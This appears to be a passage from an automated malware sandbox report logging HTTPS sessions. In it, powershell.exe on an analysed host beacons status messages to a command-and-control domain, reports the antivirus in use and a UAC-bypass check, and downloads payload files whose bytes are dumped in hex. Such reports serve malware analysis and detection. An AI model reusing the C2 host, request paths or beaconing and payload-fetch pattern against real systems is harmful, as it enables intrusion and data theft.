                                                                                    Data Ascii: meFeWqE`3eLWlSvXl0RelPyUkCmW2irRTWnbGqITlyh`oONP3mC[1mEPVeKP1GoRTOC[1mEPVeKP1KT[DeFdVSELWShS0[rX1OCeGTxWlqhLkWsX2mCdT82LDuDTV8oRTOC[1mEPVeKP1GoRTOC[1mEPVeJS3y7WEC{[0CUPmW`VD5vUG[RcFKXPjeiW2irTminbFL{ToqSW{WsTjeVb0qXTlyQe{CMRTOC[1mEPVeKP1GoRTOC[1mEPVeKS3yu
                                                                                    2024-11-08 10:29:35 UTC1369INData Raw: 56 65 4b 50 30 4b 77 56 6d 65 46 60 30 71 58 52 6f 71 59 64 57 4b 78 56 6d 69 72 5b 44 6d 44 4c 46 65 4a 52 47 71 6e 58 6a 69 56 63 44 38 32 4c 44 75 4b 50 31 47 6f 52 54 4f 52 4c 56 4f 75 60 33 65 50 54 31 47 71 58 54 69 52 4c 46 4f 48 55 55 5b 4c 64 55 6a 79 5b 57 69 53 64 46 4b 70 60 46 75 60 57 30 44 30 56 6c 30 4b 64 6a 38 44 50 59 57 5b 4c 6b 6d 31 55 45 4b 53 4c 31 34 54 53 59 6d 4f 64 6a 6a 79 55 55 4b 56 63 44 38 54 60 32 69 4e 57 47 6a 76 55 54 65 57 64 57 71 44 55 6c 30 4e 63 57 54 30 56 6d 53 4b 4f 47 6d 54 60 46 6d 4f 53 47 5b 73 56 6d 53 57 64 6a 34 70 53 55 43 4e 57 30 5b 70 55 59 71 57 4f 54 38 54 5b 46 6d 51 53 47 54 78 55 56 71 53 4c 6a 34 37 50 6c 71 4f 64 6a 6d 35 55 57 53 6e 60 57 6d 54 5b 32 69 4e 63 57 6a 76 55 57 53 4a 60 54 38 44
                                                                                    Data Ascii: VeKP0KwVmeF`0qXRoqYdWKxVmir[DmDLFeJRGqnXjiVcD82LDuKP1GoRTORLVOu`3ePT1GqXTiRLFOHUU[LdUjy[WiSdFKp`Fu`W0D0Vl0Kdj8DPYW[Lkm1UEKSL14TSYmOdjjyUUKVcD8T`2iNWGjvUTeWdWqDUl0NcWT0VmSKOGmT`FmOSG[sVmSWdj4pSUCNW0[pUYqWOT8T[FmQSGTxUVqSLj47PlqOdjm5UWSn`WmT[2iNcWjvUWSJ`T8D


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.11.3049770104.21.86.2194438708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:29:36 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ba816f412b881e3aaad6d408d85d0439 HTTP/1.1
                                                                                    Content-Type: application/json
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    Content-Length: 85
                                                                                    2024-11-08 10:29:36 UTC85OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4a 6f 62 20 69 73 20 72 75 6e 6e 69 6e 67 2e 20 4a 6f 62 20 49 44 3a 20 31 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 43 68 65 63 6b 20 6d 75 74 65 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                    Data Ascii: [ "\"Job is running. Job ID: 1\"", "\"Check mutext\"", "----------"]
                                                                                    2024-11-08 10:29:37 UTC943INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:29:37 GMT
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D8946tDI8eeXuxqUrJjce4mahiKv9SCTBUPw4%2B0NyaOWwwnOQLmNmSzxHpKtvcdinrBTttcCBHtMNBvoCHxaHK%2BB2MQEzvfmo3XYx0%2B9OMgozv%2BI6a05i5lywU7lEUcOZVL9ZyIsEAfZ"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1390&sent=3991&recv=2098&lost=0&retrans=0&sent_bytes=5535262&recv_bytes=26369&delivery_rate=55694822&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e20a7a731855-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=114053&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1034&delivery_rate=35847&cwnd=241&unsent_bytes=0&cid=fafb4ec20d77f3e6&ts=830&x=0"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.11.3049771104.21.86.2194438708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:29:37 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ba816f412b881e3aaad6d408d85d0439 HTTP/1.1
                                                                                    Content-Type: application/json
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    Content-Length: 86
                                                                                    2024-11-08 10:29:37 UTC86OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4d 75 74 65 78 20 69 73 20 6e 6f 74 20 6c 6f 63 6b 65 64 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 41 56 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                    Data Ascii: [ "\"Mutex is not locked\"", "\"AV Windows Defender\"", "----------"]
                                                                                    2024-11-08 10:29:38 UTC944INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:29:38 GMT
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kXc6Qzu3q4GEOJ%2FAUlhD9y7%2Fg13%2Bp5tQ1BRLyFyqJp8G8iH1zDEt6EWa04zxHf8QMX2UZFjXfCyBQ7HLb5q0TVuqwNdBvvK9ERSI2WCXAjWbelCCrDI4a%2F1Sa9nA9Wr9V2RxPN877Azm"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=7175&sent=3128&recv=1588&lost=0&retrans=11&sent_bytes=4326715&recv_bytes=36023&delivery_rate=49158249&cwnd=274&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e2116d0c178c-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=102236&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1035&delivery_rate=37476&cwnd=252&unsent_bytes=0&cid=fe7d5484c45a3fe1&ts=823&x=0"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.11.3049772104.21.86.2194439184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:29:38 UTC394OUTGET /file2/4c4ffc93c89dfb9b826b1b24bd745331d0c2aafb3bfb560c0ae79c0e296229154220dabcd48c417e74866081b7c5d20c49a289c543f24eec22cbab522d3402e79738e8af51a6b4c56e1b482bb7c2375dc70d620959fecb0a13db5f7c69a828930bf4d46f7d70cd6f4f8d4a9738b8bcc2 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-11-08 10:29:39 UTC1059INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:29:39 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 13576
                                                                                    Connection: close
                                                                                    content-disposition: attachment; filename=file; filename*=UTF-8''file
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J6cjk9NgJnGZWCwzOVsAPhm5MUp68LkEJqphPVXbnH7DYHkYnwkRoN%2FMrikTogDuWn%2BroV6lQmmoadBuN1C%2BsRUA4%2FAEiAALcUpWwFQSfKfrkZgAyZ57uzsYFzyvSxputijtlacEee8L"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1624&sent=13371&recv=7018&lost=0&retrans=0&sent_bytes=18623259&recv_bytes=22935&delivery_rate=19825412&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e2175bbe6281-ORD
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=124243&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1008&delivery_rate=31263&cwnd=33&unsent_bytes=0&cid=5f5e14df5ff4a6bf&ts=863&x=0"
                                                                                    2024-11-08 10:29:39 UTC310INData Raw: 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 df a4 d2 6c 5a 01 00 00 20 05 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: PK!lZ [Content_Types].xml (
                                                                                    2024-11-08 10:29:39 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    2024-11-08 10:29:39 UTC1369INData Raw: a1 09 89 2f fb 7c 66 5c 12 5a fe e7 8a e6 19 3f 36 ef 21 59 b4 5f e1 6f 1b 9c 5d 41 f3 01 00 00 ff ff 03 00 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 cb 81 d6 93 39 07 00 00 7f 25 00 00 11 00 00 00 77 6f 72 64 2f 64 6f 63 75 6d 65 6e 74 2e 78 6d 6c e4 5a db 72 db 36 10 7d ef 4c ff 01 a3 97 b6 33 8e 79 11 2f a2 26 56 86 92 ec d4 ed b4 f5 c4 ed f4 19 22 21 11 35 49 b0 00 28 59 fd fa ee 92 a2 ae 76 4a 49 4e 53 a7 7e 08 29 80 38 bb d8 3d 7b 01 99 b7 ef 1e b3 94 cc 99 54 5c e4 57 1d eb d2 ec 10 96 47 22 e6 f9 ec aa f3 db af 37 6f 7a 1d a2 34 cd 63 9a 8a 9c 5d 75 96 4c 75 de 0d be fe ea ed a2 1f 8b a8 cc 58 ae 09 40 e4 aa bf 28 a2 ab 4e a2 75 d1 37 0c 15 25 2c a3 ea 32 e3 91 14 4a 4c f5 65 24 32 43 4c a7 3c 62 c6 42 c8 d8 b0 4d cb ac ee 0a 29 22 a6 14 c8 1b d1
                                                                                    Data Ascii: /|f\Z?6!Y_o]APK!9%word/document.xmlZr6}L3y/&V"!5I(YvJINS~)8={T\WG"7oz4c]uLuX@(Nu7%,2JLe$2CL<bBM)"
                                                                                    2024-11-08 10:29:39 UTC1369INData Raw: 31 c3 e5 ac 4e 79 b0 af 66 72 8b d1 6d 12 9a 37 0a a0 b4 bb 18 b7 af b5 61 f1 c6 be e3 58 bb 1b b0 6e 5c df 71 dd 9b 2f 2d a1 0d c6 a5 ac 5b 99 b5 97 2f c8 62 15 96 ab 5a f7 df 0f 96 a7 c5 6c 7a b0 97 ca 57 37 20 61 22 c4 03 1c 93 15 b9 2f e0 dc 4c 53 ae f4 8b c7 3e f6 20 09 9d 43 e1 90 0c 78 09 31 a9 04 04 75 f3 6d 4f 35 b9 21 11 45 15 a0 cb 75 96 80 56 24 61 69 81 31 5e 42 1f 22 ab af 84 8d 83 21 6b 46 ac d0 0a 1e c4 9e b5 4d 38 bb 63 cb 0a dd 31 f2 fe 75 86 33 9c 9f 5c a7 67 e1 e9 f3 bf be 81 97 60 ce ed 56 1e c7 94 3f 2d 25 96 00 e0 43 fd 05 01 ea 25 a6 fb 8a 5c 38 ff 67 c9 24 67 40 a8 a2 2e 1f 53 c6 52 32 85 5e 66 75 a0 d1 34 aa ea c9 9c 53 c2 32 a8 40 b8 ba 48 44 ce 90 a3 0d eb 32 21 91 87 34 07 e0 a2 58 e2 5a aa 14 44 46 a5 0c 70 11 45 2d e8 92 14
                                                                                    Data Ascii: 1Nyfrm7aXn\q/-[/bZlzW7 a"/LS> Cx1umO5!EuV$ai1^B"!kFM8c1u3\g`V?-%C%\8g$g@.SR2^fu4S2@HD2!4XZDFpE-
                                                                                    2024-11-08 10:29:39 UTC516INData Raw: 27 41 31 a8 bd 31 99 90 11 76 0e 94 4a 77 67 a5 7c 40 e1 5f 22 85 1a 18 51 be af 54 63 43 42 63 c7 d3 aa fa 12 0b 11 50 ee 1c 21 da 71 61 9d 31 3b 3e c0 f7 a5 eb 50 24 24 4c 74 dc 8a fe 73 cb 3b 17 ca 6b 21 2a 0b 64 73 72 43 fd b7 94 5b 0a 8c a7 35 2d c7 c3 c3 b5 a0 e7 f9 5e a3 bb d6 af 01 54 6e e3 06 cd 41 63 d0 58 eb d3 00 34 1a c1 4e 53 2e a6 ce 66 2d f0 96 d8 1c 28 6d 5a 74 f7 9b fd 7a d5 c0 e7 f4 d7 b7 f0 5d 5f 7d 0c bc 06 a5 4d 6f 0b 3f 1c 06 99 0d 73 a0 b4 e9 6f e1 fd 5e bb d7 37 f5 6b 50 da 6c 6c e1 9b 95 6e df 6b 1a 78 0d 8a 28 49 a6 5b e8 8a df a8 07 ab dd ae 21 13 46 2f 5b e1 6d df 1b 36 6b 4b 78 86 2a e7 a2 2b 95 4f 64 51 ac c5 e8 1e e3 43 00 68 e7 22 49 12 47 2e 66 78 82 46 80 0b 10 25 87 9c 38 bb 24 8c 20 f0 66 28 61 02 86 2b b5 ca b0 52 87
                                                                                    Data Ascii: 'A11vJwg|@_"QTcCBcP!qa1;>P$$Lts;k!*dsrC[5-^TnAcX4NS.f-(mZtz]_}Mo?so^7kPllnkx(I[!F/[m6kKx*+OdQCh"IG.fxF%8$ f(a+R
                                                                                    2024-11-08 10:29:39 UTC1369INData Raw: 04 c1 df 86 6d f6 ee 38 3d 46 6d ea fb f8 c8 44 c2 d9 40 d4 a6 12 53 c3 8c 97 d0 5c a2 d8 ca 18 c5 34 8f dc 45 32 b2 91 dc 5f f0 91 61 70 21 c1 d3 21 a6 cc 19 8c b1 10 36 99 1b 7c 61 d0 bd 06 69 c6 ee f6 3d ba 88 4d 24 97 64 6a 43 ee 22 c6 f2 c8 3e 9b 06 11 8a 67 56 ce 24 89 f2 d8 2b 62 0a 21 8a 9c 9b 4c 5a 49 30 f3 84 a8 3e f8 01 25 85 ee be 43 b0 e1 ee b7 9f ed db 90 86 ec 01 a2 66 e6 dc 76 24 30 33 cf e3 82 4e 10 b6 29 ef f2 d8 48 b1 5d 4e ac d1 d1 9b 87 46 68 ef 62 4c d1 31 1a 63 ec dc be 62 c3 b3 99 61 f3 8c f4 d5 08 b2 ca 65 6c b3 cd 55 64 c6 aa ea 27 58 40 ad a4 8a 1b 8b 63 89 30 42 76 1f 87 ac 80 cf de 62 23 f1 2c 50 12 23 5e a4 f9 fa d4 0c 99 01 5c 75 b1 35 5e e9 68 6a a4 52 c2 d5 a1 b5 93 b8 21 62 63 7f 85 5a 6f 46 c8 08 2b d5 17 f6 78 5d 70 c3
                                                                                    Data Ascii: m8=FmD@S\4E2_ap!!6|ai=M$djC">gV$+b!LZI0>%Cfv$03N)H]NFhbL1cbaelUd'X@c0Bvb#,P#^\u5^hjR!bcZoF+x]p
                                                                                    2024-11-08 10:29:39 UTC1369INData Raw: 8e 61 c3 11 82 e5 3e 0f c5 a7 f1 0c 76 3c b4 4d 6c 3c f8 b5 60 f6 08 70 75 12 45 d2 f3 71 d8 87 35 df e3 d2 d8 e0 d5 69 74 fe 8c 42 6b 8b 0c 5a 21 bd ab 48 cb 48 4e db 60 ba a3 db f2 36 df 9a 1d 53 81 35 74 4f 73 85 54 7d bf 9b f2 e3 45 76 b7 14 52 a1 9c 41 38 50 86 1d a8 a4 8e 8b ce fe 87 03 b1 0f b7 24 4f 4e 6e f3 60 17 90 9d 4b e8 3a cf 52 f2 ce 26 2b 89 2a e0 ea 41 cb 8a a2 20 b4 00 26 0b 54 31 f3 80 f2 b9 91 25 a8 ac 11 84 7a 9e 78 58 a1 0d 5c 86 0f 8a e2 5b a9 e8 b3 14 06 b1 79 89 0a 10 7a e5 78 a7 4c 75 c9 d0 b6 55 bc 6e ad 6f a0 5b 6e bd 45 72 a0 ff 37 51 86 16 ff ab 5d ac 90 42 85 21 aa 71 3f 01 17 4a 32 af 85 e5 27 69 26 d0 20 15 dc df c6 c2 b5 cb 76 35 af 5b 2f 58 08 c4 21 8f 07 ed 74 26 31 f4 c6 4d 56 29 7a fc 81 5b 83 3a 07 e9 be cb 1f 1d 49
                                                                                    Data Ascii: a>v<Ml<`puEq5itBkZ!HHN`6S5tOsT}EvRA8P$ONn`K:R&+*A &T1%zxX\[yzxLuUno[nEr7Q]B!q?J2'i& v5[/X!t&1MV)z[:I
                                                                                    2024-11-08 10:29:39 UTC1369INData Raw: cb ed 77 a6 e0 25 0b 85 29 87 cd 0b ae 12 c7 fe 64 4f 43 63 a1 f3 d4 c1 f1 c7 d5 9b 1f a5 96 80 95 85 ac 0b 31 80 ea ef 1a 3b 06 3d ae f2 89 ca 2e d3 2a c9 a9 6f f9 fc 46 86 8f 3c 9a 16 ea 8b b3 91 29 4b 7d f8 f3 fa 2e 13 32 53 89 ec 6c f4 d1 94 a9 3e 9c f2 44 5c 89 28 e2 a9 f5 c3 74 21 22 fe 6b c1 d3 9f 39 8f 36 9f ff f9 d5 24 a3 fa 83 50 96 a9 7a 7d 78 32 31 a3 20 ce a3 2f 2f 21 5f ea d4 a6 be 4d 99 d6 e4 9b 0e 88 f5 af 4b b1 29 dc 84 ff 77 05 db af 95 68 8b 5f 70 a6 f3 7b b0 bf 8d 30 d5 47 21 0e 74 44 6e b5 b6 9d 59 6e b5 dd fc 0a 55 d0 e1 5b 15 74 f4 56 05 1d bf 55 41 93 b7 2a e8 e4 ad 0a fa f0 56 05 19 cc 5f 59 90 48 23 95 fe cd ef 61 31 80 ba 8b e3 70 23 9a e3 30 1b 9a e3 f0 12 9a e3 b0 0a 9a e3 70 02 9a e3 18 e8 68 8e 63 1c a3 39 8e 61 8a e0 14 32
                                                                                    Data Ascii: w%)dOCc1;=.*oF<)K}.2Sl>D\(t!"k96$Pz}x21 //!_MK)wh_p{0G!tDnYnU[tVUA*V_YH#a1p#0phc9a2
                                                                                    2024-11-08 10:29:39 UTC1369INData Raw: 1b d1 2b 13 39 c3 51 29 c9 4d e9 9d 9b dc 88 de 49 ca 8d 40 67 2b b8 45 c0 65 2b 18 8f cb 56 30 de 27 5b 41 8a 4f b6 1a 30 0b 70 23 7a 4f 07 dc 08 b4 51 21 02 6d d4 01 33 05 37 02 65 54 10 ee 65 54 48 41 1b 15 22 d0 46 85 08 b4 51 e1 04 0c 67 54 18 8f 33 2a 8c f7 31 2a a4 f8 18 15 52 d0 46 85 08 b4 51 21 02 6d 54 88 40 1b 15 22 d0 46 f5 9c db 3b c3 bd 8c 0a 29 68 a3 42 04 da a8 10 81 36 aa 99 2f 0e 30 2a 8c c7 19 15 c6 fb 18 15 52 7c 8c 0a 29 68 a3 42 04 da a8 10 81 36 2a 44 a0 8d 0a 11 68 a3 42 04 ca a8 20 dc cb a8 90 82 36 2a 44 a0 8d 0a 11 68 a3 56 97 1a fa 1b 15 c6 e3 8c 0a e3 7d 8c 0a 29 3e 46 85 14 b4 51 21 02 6d 54 88 40 1b 15 22 d0 46 85 08 b4 51 21 02 65 54 10 ee 65 54 48 41 1b 15 22 d0 46 85 08 b4 51 cd c1 c2 01 46 85 f1 38 a3 c2 78 1f a3 42 8a
                                                                                    Data Ascii: +9Q)MI@g+Ee+V0'[AO0p#zOQ!m37eTeTHA"FQgT3*1*RFQ!mT@"F;)hB6/0*R|)hB6*DhB 6*DhV})>FQ!mT@"FQ!eTeTHA"FQF8xB
                                                                                    2024-11-08 10:29:39 UTC1369INData Raw: d8 49 11 6c 99 36 1c d4 22 44 93 38 0c 98 22 40 b9 5a 2f c2 9f 2f 4f 77 45 18 18 8b 15 c5 02 14 5b 84 7b 66 c2 87 e5 c7 0f f7 ed bc 65 e5 33 b3 d6 9d 69 02 47 51 66 2e c9 22 ac ad 6d e6 51 64 48 cd 24 36 13 68 98 72 8b 15 68 89 ad 9b ea 75 24 b1 fe b5 69 ee 08 c8 06 5b 5e 72 c1 ed 3e 4a e2 38 0f 7b 8c 7e 0f 05 aa 8a 13 f6 08 64 23 99 b2 9d 3e d2 4c 38 22 28 53 f3 c6 1c 69 ed 7b 68 2d 68 da 68 20 cc 18 d7 8f 14 07 9e c4 5c 9d 30 68 7a 01 92 9c 68 30 50 d9 89 6b a6 af a8 43 39 39 8a bb 48 8a 33 20 1b 07 48 2e 00 39 61 bb 71 8c a2 67 44 4e 39 e4 70 3a 8e 93 9f 38 9c 0e 38 ff 56 cc 00 40 37 a3 10 49 7a ac c3 0f 5e 3e 60 19 6a 69 3d 0e 77 f4 28 f2 5a 6c 71 8d 4d 3d 24 b2 71 0d 66 27 dc 5e fa fb 2d c9 fc cb 5a 81 c6 a5 70 24 f7 04 05 ee 21 08 3a b0 3f ba 7b e9
                                                                                    Data Ascii: Il6"D8"@Z//OwE[{fe3iGQf."mQdH$6hrhu$i[^r>J8{~d#>L8"(Si{h-hh \0hzh0PkC99H3 H.9aqgDN9p:88V@7Iz^>`ji=w(ZlqM=$qf'^-Zp$!:?{


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.11.3049773104.21.86.2194438708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:29:39 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ba816f412b881e3aaad6d408d85d0439 HTTP/1.1
                                                                                    Content-Type: application/json
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    Content-Length: 62
                                                                                    2024-11-08 10:29:39 UTC62OUTData Raw: 5b 0d 0a 20 20 20 20 22 30 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 6f 20 63 61 6e 20 62 79 70 61 73 73 20 75 61 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                    Data Ascii: [ "0", "\"ko can bypass uac\"", "----------"]
                                                                                    2024-11-08 10:29:39 UTC933INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:29:39 GMT
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hrMgYD%2FMxPLY3yBJiaBIzj3qujR%2B4noTmqIEKenQZZeV2vCb5glhCMNFJfgRWMeUgCTRYb0wXuiSjGbWojUCa85P8VEdLUaTo8DeUE2zaKfbAEsHEkrnESxQaksRoOKCF6yvEmlazLV7"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=47210&sent=63&recv=64&lost=0&retrans=0&sent_bytes=22930&recv_bytes=28083&delivery_rate=2279469&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e2183d378cab-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=102419&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1011&delivery_rate=37314&cwnd=252&unsent_bytes=0&cid=fa47f01a409979f5&ts=831&x=0"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.11.3049777104.21.86.2194435056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:29:43 UTC394OUTGET /file2/71bce99b7502b19ff2a07905ab2d1339c709feba29d711b34cdd49a281e353309644c5163adc6fb4a31548ae03ae3e92419435881eeebe7f4ae1c2626a34d7ec2fa7eb88b6aca77f088cd4d49b095045c28535df70e5ab5d0a2b5b0c8ad3e83b6c86bda9d5d720ef55b509d4734a348e HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-11-08 10:29:44 UTC1058INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:29:44 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 12146
                                                                                    Connection: close
                                                                                    content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CcUfPLgrvaQv39FPQ2SjKXyH3bmYFG%2BcE5bQKHO5nqUjzA93BYvODSXs3VZf%2FuvFgZEJIL1SEMMZ0Pn5uQp2ipk03LznCPtZMoC5N3jjsG8mpU09BB59j2PD2ThGwP384qwQCILFn8Mg"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=20829&sent=9593&recv=4841&lost=0&retrans=0&sent_bytes=13406679&recv_bytes=29617&delivery_rate=61514666&cwnd=260&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e234ba161fe3-IAD
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=109440&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1008&delivery_rate=34978&cwnd=253&unsent_bytes=0&cid=61e287fdf0ec0f82&ts=820&x=0"
